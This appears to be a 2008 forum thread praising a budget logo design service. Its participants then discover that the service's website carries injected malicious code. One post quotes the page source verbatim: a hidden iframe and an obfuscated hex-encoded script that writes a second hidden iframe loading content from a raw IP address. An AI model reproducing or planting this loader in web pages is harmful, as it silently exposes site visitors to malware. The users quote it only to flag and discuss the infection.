Seems like a pretty good logo company - 1/15/2008 18:37:02
Okay, so that's a bit of an understatement. From what I've seen of them so far I'm damned impressed. It's just reminded me reading Mr Fonty from Finland's ramblings about the worst logo that I was going to mention this company. :)

I've got a couple of graphics apps, as well as some logo design software that's got some template type pre-sets, and a number of icons that are interchangeable, but I tend to seem to lack imagination somehow when it comes to designing logos. At the moment I'm involved in setting up a new charity, and they're wanting a new logo (the current version's one I did, but it's not very well anti-aliased) so off we went in search of logo services. After looking through some of their work they've got on their site they decided it looked okay, so decided to give it a go.

Late on Saturday night I filled in the order form, giving all the details about the organisation, it's philosophy, it's purpose etc., and as there's a committee of 10 deciding on the logo, a summary of the conversation between them all on their forum talking about ideas for the logo, along with screenshots of logos they'd seen on the web they liked the style of.

Fast forward to Monday morning when around 10am I got bored at work and decided to check my personal emails...and was very surprised to find sitting in my inbox waiting for me an email from them, complete with 12 logo suggestions for the committee to ponder over and decide which one they'd like to go with and have revisions done of.

Of course I've spent most of the evening faffing around with Colorzilla trying to find suitable colour combinations they want on the desired design, accompanied by comments like, "no, a bit lighter than that but not washed out", "can we have a vibrant green", "I don't mind going lighter as long as it doesn't look swampy"...

...I think they've nearly decided though! :)

Anyway, this is the site if it's any use to anyone: 25poundlogo.co.uk/index.php (possible virus on page, follow link at own risk - see posts below for details)

Thanks for that. I'm am ultra non creative person and this seems like a great place to get an inexpensive nice simple logo. And since you have seemed to have some good luck with them (I love referrals from actual real clients) I believe I'll give them a try when I need a logo, which seems to be more often than I care.

Ah, and I see they have the US version: 50dollarlogo.com

Wombe & Tailside.... view the source code and search for "doctype" multiple times :)

HTML source has some odd code inside it...

<body><iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v4763f7dd14085(v4763f7dd14afd){ function v4763f7dd1516b () {var v4763f7dd179d5=16; return v4763f7dd179d5;} return(parseInt(v4763f7dd14afd,v4763f7dd1516b()));}function v4763f7dd19f87(v4763f7dd1a782){ var v4763f7dd1bb6e=2; var v4763f7dd1af76='';for(v4763f7dd1b76d=0; v4763f7dd1b76d<v4763f7dd1a782.length; v4763f7dd1b76d+=v4763f7dd1bb6e){ v4763f7dd1af76+=(String.fromCharCode(v4763f7dd14085(v4763f7dd1a782.substr(v4763f7dd1b76d, v4763f7dd1bb6e))));}return v4763f7dd1af76;} document.write(v4763f7dd19f87('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D393665207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313436323538292B2737365C272077696474683D363734206865696768743D323137207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>

Kaspersky doesn't like it, hope it is a false positive :)

Hmmmm...most odd. None of my stuff's picking anything up, and all my scans are coming back clean and usually Spyware Detector picks up anything and everything that it considers even slightly suss. NOD32's coming up clean too. :)

Mmmmm, interesting use of doctypes there! Maybe they thought you can't have too much of a good thing! :)

- That's why I'm a fan of Kaspersky :) I received a prompt asking me if I wanted to display a page that contains a virus. With the proactive web defense, I don't even both with regular scans. With the hourly updates, it is pretty hard for a virus to slip by.

I've emailed and asked them about the odd iframe btw - well I was emailing the latest changes to the new logo and 'just happened to mention' that I'd mentioned them on a web forum and a couple of people had received virus warnings when trying to visit the site.

Ah, but Donkey is the font of all knowledge when it comes to practically anything about something. He has vast amounts of knowledge that are practically useless to neither man nor beast, but they're incredibly interesting bits of useless stuff! :)

Nope. I did mention it to them in an email the other day and the lady I'm dealing with said she'd pass it on to their designers.

Darn. I was hoping you would hear something (good) back from them prior to me giving them a try.

Of course, I guess I could email and ask them too...

Perhaps it's another Kaspersky false positive?
Windows Explorer Virus?
Nod32 didn't find anything.

I don't know about anyone else, but, when I go to the site I get transferred to my startup page within a few seconds (using computer at work).

At home, it locks up my browser.....hmmmmmmmm

Most likely you're safe if browsing in anything other than IE. Swoosh, what were you running?

- Looking at the source code for the page, it is definitely virus-like behavior. I see this often on websites that are hacked - an iframe is inserted into the page, the source is what contains the virus. More likely the low detection rates of NOD32, rather than the false positive of Kaspersky. Whatever it is, the source code sure looks fishy :)

Wonder if this is that mystery virus thing I've seen reported: http://technology.timesonline.co.uk/tol/news/tech_and_web/article3212085.ece

Looks like it only effects Windows :)

Same here - NOD32's coming up clean, so's BitDefender on my desktop, and SpywareDetector. I ran the Kapersky online scan on my laptop too, and that's clean. I never go online with IE though - only Firefox or Opera.

As Roger says, it's a scary world out there.

On a positive note though the committee highly delighted with the logo they've come up with, and all actually agreed on the same revision on the logo (a first!). We're just waiting for the final revision to come back from a slight tweak on the colours, and we should have the finished article and the high res versions by the end of the week.

Just had a Kaspersky virus analyst check it out. Not a false positive according to him.
